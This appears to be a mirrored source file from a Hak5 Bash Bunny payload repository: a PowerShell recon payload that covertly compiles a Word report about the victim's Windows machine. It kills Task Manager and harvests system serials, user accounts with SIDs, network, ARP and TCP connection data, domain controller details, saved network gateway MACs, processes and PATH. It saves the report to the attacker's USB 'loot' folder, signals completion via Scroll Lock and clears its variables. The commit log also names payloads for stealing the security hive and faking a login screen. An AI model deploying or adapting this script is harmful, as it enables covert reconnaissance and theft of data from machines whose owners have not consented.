mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
8cd8d859cd
* Add files via upload * Update readme.md * Update payload.txt * Update readme.md * Update readme.md * Update readme.md * Update readme.md * Update readme.md * Add files via upload * Update readme.md * Update readme.md * Add Payload WIN_PoSH_HKU_RegBackUp * Update readme.md * Update payload.txt * Change for admin shell * Update readme.md * Update payload.txt * Update payload.txt * Update readme.md * Added payload WIN_PoSH_SaveSecurityHive Added new payload to exfiltration that saves the HKLM security hive to the bunny * Morse Code File Exfiltration A bit pointless with limitation of morse code but I thought it was fun to create. * Update readme.md * Update for non-alphanumeric * Update for timing * Update readme.md * Update readme.md * Update readme.md * Update readme.md * Update payload.txt * New payload - Fake Login Shows a fake version of the windows 10 login screen * Update readme.md * Changes to Fake Login Payload * Changes to Fake Login * Win_PoSH_FakeLogin: Changes to payload and readme * New recon payload: Win_PoSH_WordReport * Update fixed typo: Win_PoSH_WordReport
300 lines
11 KiB
PowerShell
300 lines
11 KiB
PowerShell
Function New-WordTable {
|
||
[cmdletbinding(
|
||
DefaultParameterSetName='Table'
|
||
)]
|
||
Param (
|
||
[parameter()]
|
||
[object]$WordObject,
|
||
[parameter()]
|
||
[object]$Object,
|
||
[parameter()]
|
||
[int]$Columns,
|
||
[parameter()]
|
||
[int]$Rows,
|
||
[parameter(ParameterSetName='Table')]
|
||
[switch]$AsTable,
|
||
[parameter(ParameterSetName='List')]
|
||
[switch]$AsList,
|
||
[parameter()]
|
||
[string]$TableStyle,
|
||
[parameter()]
|
||
[Microsoft.Office.Interop.Word.WdDefaultTableBehavior]$TableBehavior = 'wdWord9TableBehavior',
|
||
[parameter()]
|
||
[Microsoft.Office.Interop.Word.WdAutoFitBehavior]$AutoFitBehavior = 'wdAutoFitContent'
|
||
)
|
||
#Specifying 0 index ensures we get accurate data from a single object
|
||
$Properties = $Object[0].psobject.properties.name
|
||
$Range = @($WordObject.Paragraphs)[-1].Range
|
||
$Table = $WordObject.Tables.add(
|
||
$WordObject.Range,$Rows,$Columns,$TableBehavior, $AutoFitBehavior)
|
||
|
||
Switch ($PSCmdlet.ParameterSetName) {
|
||
'Table' {
|
||
If (-NOT $PSBoundParameters.ContainsKey('TableStyle')) {
|
||
#$Table.Style = "Medium Shading 1 - Accent 1"
|
||
$Table.Style = "Grid Table 4 - Accent 1"
|
||
}
|
||
$c = 1
|
||
$r = 1
|
||
#Build header
|
||
$Properties | ForEach {
|
||
Write-Verbose "Adding $($_)"
|
||
$Table.cell(($r),($c)).range.Bold=1
|
||
$Table.cell($r,$c).range.text = $_
|
||
$c++
|
||
}
|
||
$c = 1
|
||
#Add Data
|
||
For ($i=0; $i -lt (($Object | Measure-Object).Count); $i++) {
|
||
$Properties | ForEach {
|
||
$Table.cell(($i+2),$c).range.Bold=0
|
||
$Table.cell(($i+2),$c).range.text = [string]$Object[$i].$_
|
||
$c++
|
||
}
|
||
$c = 1
|
||
}
|
||
}
|
||
'List' {
|
||
If (-NOT $PSBoundParameters.ContainsKey('TableStyle')) {
|
||
$Table.Style = "Light Shading - Accent 1"
|
||
}
|
||
$c = 1
|
||
$r = 1
|
||
$Properties | ForEach {
|
||
$Table.cell($r,$c).range.Bold=1
|
||
$Table.cell($r,$c).range.text = $_
|
||
$c++
|
||
$Table.cell($r,$c).range.Bold=0
|
||
$Table.cell($r,$c).range.text = $Object.$_
|
||
$c--
|
||
$r++
|
||
}
|
||
}
|
||
}
|
||
}
|
||
Function val2addr($val){
|
||
$addr="";
|
||
foreach($i in $val){
|
||
$addr += "{0:x2} " -f $i
|
||
}
|
||
$addr.Trim().Replace(' ', ':');
|
||
}
|
||
Stop-Process -Name "Taskmgr"
|
||
$Word = New-Object -ComObject Word.Application
|
||
#$Word.Visible = $True
|
||
$Document = $Word.Documents.Add()
|
||
$Selection = $Word.Selection
|
||
$Selection.Style = 'Title'
|
||
$Selection.TypeText("PC Info Report")
|
||
$Selection.TypeParagraph()
|
||
$Selection.Style = 'Heading 1'
|
||
$Selection.TypeText("Details")
|
||
|
||
$Selection.TypeParagraph()
|
||
$selection.TypeText("Hostname: $($env:COMPUTERNAME)")
|
||
$Selection.TypeParagraph()
|
||
$selection.TypeText("User: $($env:USERNAME)")
|
||
$selection.TypeParagraph()
|
||
$selection.TypeText("Date: $(Get-Date -Format "dddd dd MMMM yyyy hh:mm:ss")")
|
||
$selection.TypeParagraph()
|
||
|
||
#OS Info
|
||
$OS = @(Get-CimInstance -ClassName Win32_OperatingSystem | ForEach {
|
||
[pscustomobject] @{
|
||
Name = $_.Caption
|
||
Version = $_.Version
|
||
BuildNumber = $_.BuildNumber
|
||
Architecture = $_.OSArchitecture
|
||
SerialNumber = $_.SerialNumber
|
||
}
|
||
})
|
||
$Selection.Style = 'Heading 2'
|
||
$Selection.TypeText("OS")
|
||
New-WordTable -WordObject $Selection -Object $OS -Columns 2 -Rows 5 -AsList
|
||
$Word.Selection.Start= $Document.Content.End
|
||
|
||
#BIOS Info
|
||
$BIOS = @(Get-WmiObject Win32_Bios | ForEach {
|
||
[pscustomobject] @{
|
||
Manufacturer = $_.Manufacturer
|
||
Name = $_.Name
|
||
Version = $_.Version
|
||
SerialNumber = $_.SerialNumber
|
||
BIOSVersion = $_.SMBIOSBIOSVersion
|
||
}
|
||
})
|
||
$Selection.TypeParagraph()
|
||
$Selection.Style = 'Heading 2'
|
||
$Selection.TypeText("BIOS")
|
||
$Selection.TypeParagraph()
|
||
New-WordTable -WordObject $Selection -Object $BIOS -Columns 2 -Rows ($BIOS.PSObject.Properties | Measure-Object).Count -AsList
|
||
$Word.Selection.Start= $Document.Content.End
|
||
|
||
#HDD Info
|
||
$DriveType = @{
|
||
0x0 = 'Unknown'
|
||
0x1 = 'No Root Directory'
|
||
0x2 = 'Removable Disk'
|
||
0x3 = 'Local Disk'
|
||
0x4 = 'Network Drive'
|
||
0x5 = 'Compact Disk'
|
||
0x6 = 'RAM Disk'
|
||
}
|
||
$Volume = @(Get-WmiObject Win32_Volume | Sort-Object -Property Name | ForEach {
|
||
[pscustomobject]@{
|
||
Drive = $_.Name
|
||
DriveType = $DriveType[[int]$_.DriveType]
|
||
Label = $_.label
|
||
FileSystem = $_.FileSystem
|
||
'FreeSpace(GB)' = '{0:N2}' -f ($_.FreeSpace /1GB)
|
||
'Capacity(GB)' = '{0:N2}' -f ($_.Capacity/1GB)
|
||
}
|
||
})
|
||
|
||
$Selection.TypeParagraph()
|
||
$Selection.Style = 'Heading 2'
|
||
$Selection.TypeText("Drives")
|
||
$Selection.TypeParagraph()
|
||
New-WordTable -WordObject $Selection -Object $Volume -Columns 6 -Rows ($Volume.Count+1) –AsTable
|
||
$Word.Selection.Start= $Document.Content.End
|
||
|
||
$SU = (Get-CimInstance -ClassName Win32_StartupCommand | Select-Object -Property Name, User, Command, Location)
|
||
$Selection.TypeParagraph()
|
||
$Selection.Style = 'Heading 2'
|
||
$Selection.TypeText("Start Up")
|
||
$Selection.TypeParagraph()
|
||
New-WordTable -WordObject $Selection -Object $SU -Columns 4 -Rows ($SU.Count+1) -AsTable
|
||
$Word.Selection.Start= $Document.Content.End
|
||
|
||
$UA =Get-WmiObject -Class Win32_UserAccount | Select-Object Caption, Domain, Name, FullName, SID
|
||
$Selection.TypeParagraph()
|
||
$Selection.Style = 'Heading 2'
|
||
$Selection.TypeText("User Accounts")
|
||
$Selection.TypeParagraph()
|
||
New-WordTable -WordObject $Selection -Object $UA -Columns 5 -Rows ($UA.Count+1) -AsTable
|
||
$Word.Selection.Start= $Document.Content.End
|
||
|
||
$Selection.Style = 'Heading 1'
|
||
$Selection.TypeText("Networking")
|
||
|
||
$NAC = (Get-CimInstance -ClassName Win32_NetworkAdapterConfiguration -Filter "IPEnabled='True'" | Select-Object -Property Description, MACAddress, IPAddress, DefaultIPGateway)
|
||
$Selection.TypeParagraph()
|
||
$Selection.Style = 'Heading 2'
|
||
$Selection.TypeText("Network Adapters")
|
||
$Selection.TypeParagraph()
|
||
New-WordTable -WordObject $Selection -Object $NAC -Columns 4 -Rows ($NAC.Count+1) -AsTable
|
||
$Word.Selection.Start= $Document.Content.End
|
||
|
||
|
||
$NW = (Get-NetNeighbor | Where-Object State -NE Unreachable | Select-Object -Property InterfaceAlias,IPAddress, LinkLayerAddress, State, Store)
|
||
$Selection.TypeParagraph()
|
||
$Selection.Style = 'Heading 2'
|
||
$Selection.TypeText("Network")
|
||
$Selection.TypeParagraph()
|
||
New-WordTable -WordObject $Selection -Object $NW -Columns 5 -Rows ($NW.Count+1) -AsTable
|
||
$Word.Selection.Start= $Document.Content.End
|
||
|
||
# Arp Info
|
||
$ARP = (arp -a | ConvertFrom-String -PropertyNames ('Type', 'Internet', 'Address', 'Physical'))
|
||
$Selection.TypeParagraph()
|
||
$Selection.Style = 'Heading 2'
|
||
$Selection.TypeText("ARP")
|
||
$Selection.TypeParagraph()
|
||
New-WordTable -WordObject $Selection -Object $ARP -Columns 4 -Rows ($ARP.Count+1) -AsTable
|
||
$Word.Selection.Start= $Document.Content.End
|
||
|
||
|
||
$process = Get-Process | Select-Object -Property Id, Name, Company, ProductVersion, Path
|
||
|
||
# Get Listeners / ActiveTcpConnections
|
||
$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess
|
||
$listener = $listener | foreach-object {
|
||
$listenerItem = $_
|
||
$processItem = ($process | where { [int]$_.Id -like [int]$listenerItem.OwningProcess })
|
||
new-object PSObject -property @{
|
||
"LocalAddress" = $listenerItem.LocalAddress
|
||
"RemoteAddress" = $listenerItem.RemoteAddress
|
||
"State" = $listenerItem.State
|
||
"AppliedSetting" = $listenerItem.AppliedSetting
|
||
"OwningProcess" = $listenerItem.OwningProcess
|
||
"ProcessName" = $processItem.Name
|
||
}
|
||
} | select-Object LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress
|
||
|
||
$Selection.TypeParagraph()
|
||
$Selection.Style = 'Heading 2'
|
||
$Selection.TypeText("Listeners / ActiveTcpConnections")
|
||
$Selection.TypeParagraph()
|
||
New-WordTable -WordObject $Selection -Object $listener -Columns 6 -Rows ($listener.Count+1) -AsTable
|
||
$Word.Selection.Start= $Document.Content.End
|
||
|
||
$ND = (Get-CimInstance -ClassName Win32_NTDomain | Select-Object -Property ClientSiteName, DcSiteName, Description, DnsForestName, DomainControllerAddress, DomainControllerName, DomainName, Roles, Status)
|
||
$Selection.TypeParagraph()
|
||
$Selection.Style = 'Heading 2'
|
||
$Selection.TypeText("NT Domain")
|
||
$Selection.TypeParagraph()
|
||
New-WordTable -WordObject $Selection -Object $ND -Columns 2 -Rows ($ND.PSObject.Properties | Measure-Object).Count -AsList
|
||
$Word.Selection.Start= $Document.Content.End
|
||
|
||
$location = $PWD
|
||
cd 'hklm:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged'
|
||
$Mac = gci | % { $name=$_.GetValue('Description'); $mac=val2addr($_.GetValue('DefaultGatewayMac')); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;MAC_ADDRESS=$mac }}
|
||
cd $location
|
||
$Selection.TypeParagraph()
|
||
$Selection.Style = 'Heading 2'
|
||
$Selection.TypeText("Reg Access Points")
|
||
$Selection.TypeParagraph()
|
||
New-WordTable -WordObject $Selection -Object $Mac -Columns 2 -Rows ($Mac.Count+1) -AsTable
|
||
$Word.Selection.Start= $Document.Content.End
|
||
|
||
|
||
$Selection.Style = 'Heading 1'
|
||
$Selection.TypeText("Software")
|
||
$Selection.TypeParagraph()
|
||
|
||
$Selection.Style = 'Heading 2'
|
||
$Selection.TypeText("Current running process")
|
||
$Selection.TypeParagraph()
|
||
New-WordTable -WordObject $Selection -Object $process -Columns 5 -Rows ($process.Count+1) -AsTable
|
||
$Word.Selection.Start= $Document.Content.End
|
||
|
||
<#$PE = Get-WmiObject -Namespace root\cimv2 -Class CIM_ProcessExecutable | %{try{[wmi]($_.Antecedent)}catch {$null}} | Select FileName,Extension,Manufacturer,Version -ErrorAction SilentlyContinue
|
||
$Selection.TypeParagraph()
|
||
$Selection.Style = 'Heading 2'
|
||
$Selection.TypeText("CIM Process Executables")
|
||
$Selection.TypeParagraph()
|
||
New-WordTable -WordObject $Selection -Object $PE -Columns 4 -Rows ($PE.Count+1) -AsTable
|
||
$Word.Selection.Start= $Document.Content.End#>
|
||
|
||
|
||
$Selection.Style = 'Heading 1'
|
||
$Selection.TypeText("Environment Variables")
|
||
$Selection.TypeParagraph()
|
||
$envPath = $env:Path -split ";" | %{"{0}`n" -f $_}
|
||
$Selection.Style = 'Normal'
|
||
$Selection.TypeText("Path:")
|
||
$Selection.TypeParagraph()
|
||
$Selection.TypeText($envPath)
|
||
$Selection.TypeParagraph()
|
||
|
||
$Report = ((gwmi win32_volume -f 'label=''BashBunny''').Name + "loot\Report_$env:COMPUTERNAME.docx");
|
||
$Document.SaveAs([ref]$Report,[ref]$SaveFormat::wdFormatDocument)
|
||
$Word.Quit()
|
||
$null = [System.Runtime.InteropServices.Marshal]::ReleaseComObject([System.__ComObject]$Word)
|
||
|
||
$o = New-Object -com wscript.shell;
|
||
$o.SendKeys('{SCROLLLOCK}');
|
||
sleep 1;
|
||
$o.SendKeys('{SCROLLLOCK}');
|
||
sleep 1;
|
||
$o.SendKeys('{SCROLLLOCK}');
|
||
sleep 1;
|
||
$o.SendKeys('{SCROLLLOCK}');
|
||
|
||
$null = [System.Runtime.InteropServices.Marshal]::ReleaseComObject([System.__ComObject]$o)
|
||
[gc]::Collect()
|
||
[gc]::WaitForPendingFinalizers()
|
||
|
||
Remove-Variable -Name Word, OS, BIOS, DriveType, Volume, SU,
|
||
UA,NAC,NW,ARP, process, listener,listenerItem, processItem,
|
||
ND, envPath, PE, Mac, location, o -ErrorAction SilentlyContinue -Force |